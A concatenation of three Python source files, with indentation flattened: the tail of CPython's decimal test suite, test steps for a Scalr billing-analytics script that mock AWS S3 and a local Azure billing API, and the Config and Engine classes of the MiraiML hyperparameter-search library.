# to huge intermediate values when the context precision is very
# large.
# The following functions fill the available precision and are
# therefore not suitable for large precisions (by design of the
# specification).
MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus',
'logical_and', 'logical_or', 'logical_xor',
'next_toward', 'rotate', 'shift']
Decimal = C.Decimal
Context = C.Context
localcontext = C.localcontext
# Here only some functions that are likely candidates for triggering a
# MemoryError are tested. deccheck.py has an exhaustive test.
maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX)
with localcontext(maxcontext):
self.assertEqual(Decimal(0).exp(), 1)
self.assertEqual(Decimal(1).ln(), 0)
self.assertEqual(Decimal(1).log10(), 0)
self.assertEqual(Decimal(10**2).log10(), 2)
self.assertEqual(Decimal(10**223).log10(), 223)
self.assertEqual(Decimal(10**19).logb(), 19)
self.assertEqual(Decimal(4).sqrt(), 2)
self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5'))
self.assertEqual(divmod(Decimal(10), 3), (3, 1))
self.assertEqual(Decimal(10) // 3, 3)
self.assertEqual(Decimal(4) / 2, 2)
self.assertEqual(Decimal(400) ** -1, Decimal('0.0025'))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
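# mkargs assembles positional and keyword arguments for a signature by
# looking up a representative value for each parameter name in pdict.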
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build a custom test definition for each file in the test
# directory and add the definitions to the IBMTestCases classes. This
# procedure ensures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if orig_sys_decimal is not sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
steps.py
|
from gevent import monkey
monkey.patch_all(subprocess=True)
import os
import sys
cwd = os.path.dirname(os.path.abspath(__file__))
scalrpy_dir = os.path.normpath(os.path.join(cwd, '../../..'))
sys.path.insert(0, scalrpy_dir)
scalrpytests_dir = os.path.join(cwd, '../..')
sys.path.insert(0, scalrpytests_dir)
from scalrpy import analytics_processing
from scalrpy.util import billing
from scalrpytests.steplib import lib
from scalrpytests.steplib.steps import *
import datetime
import multiprocessing
import mock
import shutil
import cherrypy
import threading
import json
import time
class AnalyticsProcessingScript(lib.Script):
app_cls = analytics_processing.AnalyticsProcessing
name = 'analytics_processing'
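# Freeze "utcnow" and "today" so that the billing periods the script works on
# are deterministic across test runs.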
class MockedDateTime(datetime.datetime):
@classmethod
def utcnow(cls):
dt_format = "%Y-%m-%d %H:%M:%S"
return datetime.datetime.strptime('2015-05-01 06:00:01', dt_format)
class MockedDate(datetime.date):
@classmethod
def today(cls):
return datetime.date(2015, 5, 4)
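# Minimal CherryPy application that mimics the Azure billing API: it serves a
# canned rate card, usage aggregates filtered by the requested time window,
# and a dummy access token, all backed by fixture files.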
class AzureMockServer(object):
@cherrypy.expose
@cherrypy.tools.json_out()
def subscriptions_subscription_id_RateCard(self, *args, **kwds):
rate_file = os.path.join(scalrpy_dir, 'tests/fixtures/rate_resp.txt')
with open(rate_file, 'r') as f:
data = json.loads(f.read())
return data
@cherrypy.expose
@cherrypy.tools.json_out()
def subscriptions_subscription_id_UsageAggregates(self, *args, **kwds):
resolution = kwds['aggregationGranularity'].lower()
reported_start_time = datetime.datetime.strptime(kwds['reportedStartTime'], '%Y-%m-%dT%H:%M:%S+00:00')
reported_end_time = datetime.datetime.strptime(kwds['reportedEndTime'], '%Y-%m-%dT%H:%M:%S+00:00')
usage_file = os.path.join(scalrpy_dir,
'tests/fixtures/usage_resp_%s.txt' % resolution)
with open(usage_file, 'r') as f:
data = {'value': []}
raw_data = json.loads(f.read())
for row in raw_data['value']:
start_time = datetime.datetime.strptime(
row['properties']['usageStartTime'].split('+')[0], '%Y-%m-%dT%H:%M:%S')
if start_time < reported_start_time:
continue
if start_time > reported_end_time:
continue
data['value'].append(row)
return data
@cherrypy.expose
@cherrypy.tools.json_out()
def token_tenant_name(self, *args, **kwds):
return {'access_token': 'access_token'}
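# The three mocks below patch boto's S3 connection so that billing archives
# are "downloaded" from local fixture files (ok), are missing from the bucket
# (not_in_bucket), or yield no data at all (not_ok).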
def mock_download_aws_billing_file_ok():
def get_contents_to_filename(csv_zip_file):
src = os.path.join(scalrpy_dir, 'tests/fixtures', os.path.basename(csv_zip_file))
dst = csv_zip_file
shutil.copy(src, dst)
bucket = mock.MagicMock(name='bucket')
keys = []
for name in [
'123-aws-billing-detailed-line-items-with-resources-and-tags-2015-04.csv.zip',
'123-aws-billing-detailed-line-items-with-resources-and-tags-2015-05.csv.zip',
'333-aws-billing-detailed-line-items-with-resources-and-tags-2015-05.csv.zip']:
key = mock.MagicMock()
key.name = name
key.last_modified = 'Fri, 01 May 2015 05:50:57 GMT'
key.size = 1024
key.get_contents_to_filename = get_contents_to_filename
keys.append(key)
bucket.list.return_value = keys
bucket.get_key.return_value = keys[1]
conn = mock.MagicMock(name='conn')
conn.get_bucket.return_value = bucket
billing.boto.s3.connect_to_region = mock.MagicMock(name='connect_to_region')
billing.boto.s3.connect_to_region.return_value = conn
def mock_download_aws_billing_file_not_in_bucket():
bucket = mock.MagicMock(name='key')
bucket.list.return_value = []
conn = mock.MagicMock(name='conn')
conn.get_bucket.return_value = bucket
billing.boto.s3.connect_to_region = mock.MagicMock(name='connect_to_region')
billing.boto.s3.connect_to_region.return_value = conn
def mock_download_aws_billing_file_not_ok():
def get_contents_to_filename(csv_zip_file):
pass
bucket = mock.MagicMock(name='bucket')
keys = []
for name in [
'123-aws-billing-detailed-line-items-with-resources-and-tags-2015-04.csv.zip',
'123-aws-billing-detailed-line-items-with-resources-and-tags-2015-05.csv.zip',
'333-aws-billing-detailed-line-items-with-resources-and-tags-2015-05.csv.zip']:
key = mock.MagicMock()
key.name = name
key.last_modified = 'Fri, 01 May 2015 05:50:57 GMT'
key.size = 1024
key.get_contents_to_filename = get_contents_to_filename
keys.append(key)
bucket.list.return_value = keys
bucket.get_key.return_value = keys[1]
conn = mock.MagicMock(name='conn')
conn.get_bucket.return_value = bucket
billing.boto.s3.connect_to_region = mock.MagicMock(name='connect_to_region')
billing.boto.s3.connect_to_region.return_value = conn
@step(u"^Mock download AWS billing file not in bucket$")
def download_aws_billing_file_not_in_bucket(step):
lib.world.mock_download_aws_billing_file = mock_download_aws_billing_file_not_in_bucket
@step(u"^Mock download AWS billing file not ok$")
def download_aws_billing_file_not_ok(step):
lib.world.mock_download_aws_billing_file = mock_download_aws_billing_file_not_ok
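# Runs the analytics processing app against the mocks: datetime is frozen,
# the Azure billing URLs point at the local CherryPy server and the AWS
# billing download is replaced by the mock selected for the scenario.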
def analytics_process():
analytics_processing.datetime.datetime = MockedDateTime
analytics_processing.datetime.date = MockedDate
billing.AzureBilling.ratecard_url = 'http://127.0.0.1:8080/subscriptions_{subscription_id}_RateCard'
billing.AzureBilling.usage_url = 'http://127.0.0.1:8080/subscriptions_{subscription_id}_UsageAggregates'
billing.AzureBilling.token_url = 'http://127.0.0.1:8080/token_{tenant_id}'
analytics_processing.launch_delay = 0
lib.world.mock_download_aws_billing_file()
analytics_processing.app.load_config()
analytics_processing.app.configure()
t = threading.Thread(target=cherrypy.quickstart, args=(AzureMockServer(),))
t.start()
time.sleep(2)
analytics_processing.app.run()
t.join()
@step(u"^White Rabbit starts Analytics Processing script with options '(.*)'$")
def start(step, opts):
argv = opts.split() + ['start']
analytics_processing.app = analytics_processing.AnalyticsProcessing(argv=argv)
lib.world.app_process = multiprocessing.Process(target=analytics_process)
lib.world.app_process.start()
@step(u"^White Rabbit stops Analytics Processing script$")
def stop(step):
if lib.world.app_process.is_alive():
lib.world.app_process.terminate()
lib.ScriptCls = AnalyticsProcessingScript
def before_scenario(scenario):
lib.world.mock_download_aws_billing_file = mock_download_aws_billing_file_ok
def after_scenario(scenario):
pass
before.each_scenario(before_scenario)
after.each_scenario(after_scenario)
|
main.py
|
from threading import Thread
import pandas as pd
import warnings
import time
import os
import gc
from miraiml.util import is_valid_filename
from miraiml.core import MiraiSeeker, Ensembler
from miraiml.core import load_base_model, dump_base_model
class SearchSpace:
"""
This class represents the search space of hyperparameters for a base model.
:type id: str
:param id: The id that will be associated with the models generated within
this search space.
:type model_class: type
:param model_class: Any class that represents a statistical model. It must
implement the methods ``fit`` as well as ``predict`` for regression or
``predict_proba`` for classification problems.
:type parameters_values: dict, optional, default=None
:param parameters_values: A dictionary containing lists of values to be
tested as parameters when instantiating objects of ``model_class`` for
``id``.
:type parameters_rules: function, optional, default=lambda x: None
:param parameters_rules: A function that constrains certain parameters because
of the values assumed by others. It must receive a dictionary as input and
doesn't need to return anything. Not used if ``parameters_values`` has no
keys.
.. warning::
Make sure that the parameters accessed in ``parameters_rules`` exist
in the set of parameters defined in ``parameters_values``, otherwise
the engine will attempt to access an invalid key.
:raises: ``NotImplementedError`` if a model class does not implement ``fit``
or none of ``predict`` or ``predict_proba``.
:raises: ``TypeError`` if some parameter is of a prohibited type.
:raises: ``ValueError`` if a provided ``id`` is not allowed.
:Example:
::
>>> import numpy as np
>>> from sklearn.linear_model import LogisticRegression
>>> from miraiml import SearchSpace
>>> def logistic_regression_parameters_rules(parameters):
... if parameters['solver'] in ['newton-cg', 'sag', 'lbfgs']:
... parameters['penalty'] = 'l2'
>>> search_space = SearchSpace(
... id = 'Logistic Regression',
... model_class = LogisticRegression,
... parameters_values = {
... 'penalty': ['l1', 'l2'],
... 'C': np.arange(0.1, 2, 0.1),
... 'max_iter': np.arange(50, 300),
... 'solver': ['newton-cg', 'lbfgs', 'liblinear', 'sag', 'saga'],
... 'random_state': [0]
... },
... parameters_rules = logistic_regression_parameters_rules
... )
.. warning::
**Do not** allow ``random_state`` to assume multiple values. If ``model_class``
has a ``random_state`` parameter, force the engine to always choose the
same value by providing a list with a single element.
Allowing ``random_state`` to assume multiple values will confuse the engine
because the scores will be unstable even with the same choice of
hyperparameters and features.
"""
def __init__(self, id, model_class, parameters_values=None,
parameters_rules=lambda x: None):
self.__validate__(id, model_class, parameters_values, parameters_rules)
self.model_class = model_class
self.id = id
if parameters_values is None:
parameters_values = {}
self.parameters_values = parameters_values
self.parameters_rules = parameters_rules
@staticmethod
def __validate__(id, model_class, parameters_values, parameters_rules):
"""
Validates the constructor parameters.
"""
if not isinstance(id, str):
raise TypeError('id must be a string')
if not is_valid_filename(id):
raise ValueError('Invalid id: {}'.format(id))
dir_model_class = dir(model_class)
if 'fit' not in dir_model_class:
raise NotImplementedError('model_class must implement fit')
if 'predict' not in dir_model_class and 'predict_proba' not in dir_model_class:
raise NotImplementedError('model_class must implement predict or predict_proba')
if parameters_values is not None and not isinstance(parameters_values, dict):
raise TypeError('parameters_values must be None or a dictionary')
if not callable(parameters_rules):
raise TypeError('parameters_rules must be a function')
class Config:
"""
This class defines the general behavior of the engine.
:type local_dir: str
:param local_dir: The name of the folder in which the engine will save its
internal files. If the directory doesn't exist, it will be created
automatically. ``..`` and ``/`` are not allowed in ``local_dir``.
:type problem_type: str
:param problem_type: ``'classification'`` or ``'regression'``. The problem
type. Multi-class classification problems are not supported.
:type search_spaces: list
:param search_spaces: The list of :class:`miraiml.SearchSpace`
objects to optimize. If ``search_spaces`` has length 1, the engine
will not run ensemble cycles.
:type score_function: function
:param score_function: A function that receives the "truth" and the predictions
(in this order) and returns the score. Bigger scores must mean better models.
:type use_all_features: bool, optional, default=False
:param use_all_features: Whether to force MiraiML to always use all features
or not.
:type n_folds: int, optional, default=5
:param n_folds: The number of folds for the fitting/predicting process. The
minimum value allowed is 2.
:type stratified: bool, optional, default=True
:param stratified: Whether to stratify folds on target or not. Only used if
``problem_type == 'classification'``.
:type ensemble_id: str, optional, default=None
:param ensemble_id: The id for the ensemble. If none is given, the engine will
not ensemble base models.
:type stagnation: int or float, optional, default=60
:param stagnation: The amount of time (in minutes) for the engine to
automatically interrupt itself if no improvement happens. Negative numbers
are interpreted as "infinite".
.. warning::
Stagnation checks only happen after the engine finishes at least one
optimization cycle. In other words, every base model and the ensemble
(if set) must be scored at least once.
:raises: ``NotImplementedError`` if a model class does not implement the proper
method for prediction.
:raises: ``TypeError`` if some parameter is not of its allowed type.
:raises: ``ValueError`` if some parameter has an invalid value.
:Example:
::
>>> from sklearn.metrics import roc_auc_score
>>> from sklearn.naive_bayes import GaussianNB
>>> from sklearn.tree import DecisionTreeClassifier
>>> from miraiml import SearchSpace, Config
>>> search_spaces = [
... SearchSpace('Naive Bayes', GaussianNB),
... SearchSpace('Decision Tree', DecisionTreeClassifier)
... ]
>>> config = Config(
... local_dir = 'miraiml_local',
... problem_type = 'classification',
... score_function = roc_auc_score,
... search_spaces = search_spaces,
... use_all_features = False,
... n_folds = 5,
... stratified = True,
... ensemble_id = 'Ensemble',
... stagnation = -1
... )
"""
def __init__(self, local_dir, problem_type, score_function, search_spaces,
use_all_features=False, n_folds=5, stratified=True,
ensemble_id=None, stagnation=60):
self.__validate__(local_dir, problem_type, score_function, search_spaces,
use_all_features, n_folds, stratified, ensemble_id,
stagnation)
self.local_dir = local_dir
if self.local_dir[-1] != '/':
self.local_dir += '/'
self.problem_type = problem_type
self.search_spaces = search_spaces
self.score_function = score_function
self.use_all_features = use_all_features
self.n_folds = n_folds
self.stratified = stratified
self.ensemble_id = ensemble_id
self.stagnation = stagnation
@staticmethod
def __validate__(local_dir, problem_type, score_function, search_spaces,
use_all_features, n_folds, stratified, ensemble_id,
stagnation):
"""
Validates the constructor parameters.
"""
if not isinstance(local_dir, str):
raise TypeError('local_dir must be a string')
if not is_valid_filename(local_dir):
raise ValueError('Invalid directory name: {}'.format(local_dir))
if not isinstance(problem_type, str):
raise TypeError('problem_type must be a string')
if problem_type not in ('classification', 'regression'):
raise ValueError('Invalid problem type')
if not callable(score_function):
raise TypeError('score_function must be a function')
if not isinstance(search_spaces, list):
raise TypeError('search_spaces must be a list')
if len(search_spaces) == 0:
raise ValueError('No search spaces')
ids = []
for search_space in search_spaces:
if not isinstance(search_space, SearchSpace):
raise TypeError('All search spaces must be objects of ' +
'miraiml.SearchSpace')
id = search_space.id
if id in ids:
raise ValueError('Duplicated search space id: {}'.format(id))
ids.append(id)
dir_model_class = dir(search_space.model_class)
if problem_type == 'classification' and 'predict_proba' not in dir_model_class:
raise NotImplementedError('Model class of id {} '.format(id) +
'must implement predict_proba for ' +
'classification problems')
if problem_type == 'regression' and 'predict' not in dir_model_class:
raise NotImplementedError('Model class of id {} '.format(id) +
'must implement predict for regression problems')
if not isinstance(use_all_features, bool):
raise TypeError('use_all_features must be a boolean')
if not isinstance(n_folds, int):
raise TypeError('n_folds must be an integer')
if n_folds < 2:
raise ValueError('n_folds must be greater than 1')
if not isinstance(stratified, bool):
raise TypeError('stratified must be a boolean')
if ensemble_id is not None and not isinstance(ensemble_id, str):
raise TypeError('ensemble_id must be None or a string')
if isinstance(ensemble_id, str) and not is_valid_filename(ensemble_id):
raise ValueError('invalid ensemble_id')
if ensemble_id in ids:
raise ValueError('ensemble_id cannot have the same id as a ' +
'search space')
if not isinstance(stagnation, int) and not isinstance(stagnation, float):
raise TypeError('stagnation must be an integer or a float')
class Engine:
"""
This class offers the controls for the engine.
:type config: miraiml.Config
:param config: The configurations for the behavior of the engine.
:type on_improvement: function, optional, default=None
:param on_improvement: A function that will be executed every time the engine
finds an improvement for some id. It must receive a ``status`` parameter,
which is the return of the method :func:`request_status` (an instance of
:class:`miraiml.Status`).
:raises: ``TypeError`` if ``config`` is not an instance of :class:`miraiml.Config`
or ``on_improvement`` (if provided) is not callable.
:Example:
::
>>> from sklearn.metrics import roc_auc_score
>>> from sklearn.naive_bayes import GaussianNB
>>> from sklearn.tree import DecisionTreeClassifier
>>> from miraiml import SearchSpace, Config, Engine
>>> search_spaces = [
... SearchSpace('Naive Bayes', GaussianNB),
... SearchSpace('Decision Tree', DecisionTreeClassifier)
... ]
>>> config = Config(
... local_dir = 'miraiml_local',
... problem_type = 'classification',
... score_function = roc_auc_score,
... search_spaces = search_spaces,
... ensemble_id = 'Ensemble'
... )
>>> def on_improvement(status):
... print('Scores:', status.scores)
>>> engine = Engine(config, on_improvement=on_improvement)
"""
def __init__(self, config, on_improvement=None):
self.__validate__(config, on_improvement)
self.config = config
self.on_improvement = on_improvement
self.train_predictions_df = None
self.test_predictions_df = None
self.__is_running__ = False
self.must_interrupt = False
self.mirai_seeker = None
self.models_dir = config.local_dir + 'models/'
self.train_data = None
self.ensembler = None
self.n_cycles = 0
self.last_improvement_timestamp = None
@staticmethod
def __validate__(config, on_improvement):
"""
Validates the constructor parameters.
"""
if not isinstance(config, Config):
raise TypeError('miraiml.Engine\'s constructor requires an object ' +
'of miraiml.Config')
if on_improvement is not None and not callable(on_improvement):
raise TypeError('on_improvement must be None or a function')
def is_running(self):
"""
Tells whether the engine is running or not.
:rtype: bool
:returns: ``True`` if the engine is running and ``False`` otherwise.
"""
return self.__is_running__
def interrupt(self):
"""
Makes the engine stop on the first opportunity.
.. note::
This method is **not** asynchronous. It will wait until the engine
stops.
"""
self.must_interrupt = True
if self.ensembler is not None:
self.ensembler.interrupt()
while self.__is_running__:
time.sleep(.1)
self.must_interrupt = False
def load_train_data(self, train_data, target_column, restart=False):
"""
Interrupts the engine and loads the train dataset. All of its column names
must be either ``str`` or ``int`` instances.
.. warning::
Loading new training data will **always** trigger the loss of history
for optimization.
:type train_data: pandas.DataFrame
:param train_data: The training data.
:type target_column: str or int
:param target_column: The target column identifier.
:type restart: bool, optional, default=False
:param restart: Whether to restart the engine after updating data or not.
:raises: ``TypeError`` if ``train_data`` is not an instance of
``pandas.DataFrame``.
:raises: ``ValueError`` if ``target_column`` is not a column of
``train_data`` or if some column name is of a prohibited type.
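A minimal usage sketch (``engine`` is assumed to be an already instantiated
:class:`miraiml.Engine` and ``train_df`` a hypothetical ``pandas.DataFrame``
with a ``'target'`` column):
:Example:
::
>>> import pandas as pd
>>> train_df = pd.DataFrame({'feature': [0, 1, 2, 3], 'target': [0, 1, 0, 1]})
>>> engine.load_train_data(train_df, 'target', restart=False)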
"""
self.__validate_train_data__(train_data, target_column)
self.columns_renaming_map = {}
self.columns_renaming_unmap = {}
for column in train_data.columns:
column_renamed = str(column)
self.columns_renaming_map[column] = column_renamed
self.columns_renaming_unmap[column_renamed] = column
self.target_column = target_column
train_data = train_data.rename(columns=self.columns_renaming_map)
self.interrupt()
self.train_data = train_data.drop(columns=target_column)
self.train_target = train_data[target_column]
self.all_features = list(self.train_data.columns)
if self.mirai_seeker is not None:
self.mirai_seeker.reset()
if restart:
self.restart()
@staticmethod
def __validate_train_data__(train_data, target_column):
"""
Validates the train data.
"""
if not isinstance(train_data, pd.DataFrame):
raise TypeError('Training data must be an object of pandas.DataFrame')
train_columns = train_data.columns
if target_column not in train_columns:
raise ValueError('target_column must be a column of train_data')
for column in train_columns:
if not isinstance(column, str) and not isinstance(column, int):
raise ValueError('All column names must be either str or int')
def load_test_data(self, test_data, restart=False):
"""
Interrupts the engine and loads the test dataset. It must contain every
column of the train data, except (optionally) the target column.
The test dataset is the one for which we don't have the values for the
target column. This method should be used to load data in production.
.. warning::
This method can only be called after
:func:`miraiml.Engine.load_train_data`
:type test_data: pandas.DataFrame
:param test_data: The testing data, for which the values of the target column
are unknown.
:type restart: bool, optional, default=False
:param restart: Whether to restart the engine after loading data or not.
:raises: ``RuntimeError`` if this method is called before loading the
train data.
:raises: ``ValueError`` if the column names are not consistent.
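A minimal sketch (assuming ``engine`` has already loaded train data and
``test_df`` is a hypothetical ``pandas.DataFrame`` with the same feature
columns and no target column):
:Example:
::
>>> import pandas as pd
>>> test_df = pd.DataFrame({'feature': [4, 5]})
>>> engine.load_test_data(test_df, restart=True)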
"""
if self.train_data is None:
raise RuntimeError('This method cannot be called before load_train_data')
self.__validate_test_data__(test_data)
self.test_data = test_data.rename(columns=self.columns_renaming_map)
if restart:
self.restart()
def __validate_test_data__(self, test_data):
"""
Validates the test data.
"""
for column in self.columns_renaming_map:
if column != self.target_column and column not in test_data.columns:
raise ValueError(
'Column {} of the train data is missing from the test data'.format(column)
)
def clean_test_data(self, restart=False):
"""
Cleans the test data from the buffer.
.. note::
Keep in mind that if you don't intend to make predictions for
unlabeled data, the engine will run faster with a clean test data
buffer.
:type restart: bool, optional, default=False
:param restart: Whether to restart the engine after cleaning test data or
not.
"""
self.interrupt()
self.test_data = None
if restart:
self.restart()
def shuffle_train_data(self, restart=False):
"""
Interrupts the engine and shuffles the training data.
:type restart: bool, optional, default=False
:param restart: Whether to restart the engine after shuffling data or not.
:raises: ``RuntimeError`` if the engine has no data loaded.
.. note::
It's a good practice to shuffle the training data periodically to avoid
overfitting on a particular folding pattern.
"""
if self.train_data is None:
raise RuntimeError('No data to shuffle')
self.interrupt()
seed = int(time.time())
self.train_data = self.train_data.sample(frac=1, random_state=seed)
self.train_target = self.train_target.sample(frac=1, random_state=seed)
if restart:
self.restart()
def reconfigure(self, config, restart=False):
"""
Interrupts the engine and loads a new configuration.
.. warning::
Reconfiguring the engine will **always** trigger the loss of history
for optimization.
:type config: miraiml.Config
:param config: The configurations for the behavior of the engine.
:type restart: bool, optional, default=False
:param restart: Whether to restart the engine after reconfiguring it or
not.
"""
self.interrupt()
self.config = config
if self.mirai_seeker is not None:
self.mirai_seeker.reset()
if restart:
self.restart()
def restart(self):
"""
Interrupts the engine and starts again from last checkpoint (if any). It
is also used to start the engine for the first time.
:raises: ``RuntimeError`` if no data is loaded.
"""
if self.train_data is None:
raise RuntimeError('No data to train')
self.interrupt()
def starter():
try:
self.__main_loop__()
except Exception:
self.__is_running__ = False
raise
Thread(target=starter).start()
def __improvement_trigger__(self):
"""
Called when an improvement happens.
"""
self.last_improvement_timestamp = time.time()
if self.on_improvement is not None:
self.on_improvement(self.request_status())
def __update_best__(self, score, id):
"""
Updates the best id of the engine.
"""
if self.best_score is None or score > self.best_score:
self.best_score = score
self.best_id = id
def __check_stagnation__(self):
"""
Checks whether the engine has reached stagnation or not. If so, the
engine is interrupted.
"""
if self.config.stagnation >= 0:
diff_in_seconds = time.time() - self.last_improvement_timestamp
if diff_in_seconds/60 > self.config.stagnation:
self.interrupt()
def __main_loop__(self):
"""
Main optimization loop.
"""
self.__is_running__ = True
if not os.path.exists(self.models_dir):
os.makedirs(self.models_dir)
self.base_models = {}
self.train_predictions_df = pd.DataFrame()
self.test_predictions_df = pd.DataFrame()
self.scores = {}
self.best_score = None
self.best_id = None
self.ensembler = None
self.mirai_seeker = MiraiSeeker(
self.config.search_spaces,
self.all_features,
self.config
)
self.n_cycles = 0
self.last_improvement_timestamp = time.time()
start = time.time()
for search_space in self.config.search_spaces:
if self.must_interrupt:
break
id = search_space.id
base_model_path = self.models_dir + id
base_model_class = search_space.model_class
if os.path.exists(base_model_path):
base_model = load_base_model(base_model_class, base_model_path)
parameters = base_model.parameters
parameters_values = search_space.parameters_values
for key, value in parameters.items():
if key not in parameters_values:
warnings.warn(
'Parameter ' + str(key) + ', set with value ' +
str(value) + ', from checkpoint is not on the ' +
'provided search space for the id ' + str(id),
RuntimeWarning
)
else:
if value not in parameters_values[key]:
warnings.warn(
'Value ' + str(value) + ' for parameter ' + str(key) +
' from checkpoint is not on the provided ' +
'search space for the id ' + str(id),
RuntimeWarning
)
else:
base_model = self.mirai_seeker.seek(search_space.id)
dump_base_model(base_model, base_model_path)
self.base_models[id] = base_model
train_predictions, test_predictions, score = base_model.predict(
self.train_data, self.train_target, self.test_data, self.config)
self.train_predictions_df[id] = train_predictions
self.test_predictions_df[id] = test_predictions
self.scores[id] = score
self.__update_best__(self.scores[id], id)
total_cycles_duration = time.time() - start
will_ensemble = len(self.base_models) > 1 and\
self.config.ensemble_id is not None
if will_ensemble:
self.ensembler = Ensembler(
list(self.base_models),
self.train_target,
self.train_predictions_df,
self.test_predictions_df,
self.scores,
self.config
)
ensemble_id = self.config.ensemble_id
if self.ensembler.optimize(total_cycles_duration):
self.__update_best__(self.scores[ensemble_id], ensemble_id)
self.__improvement_trigger__()
self.n_cycles = 1
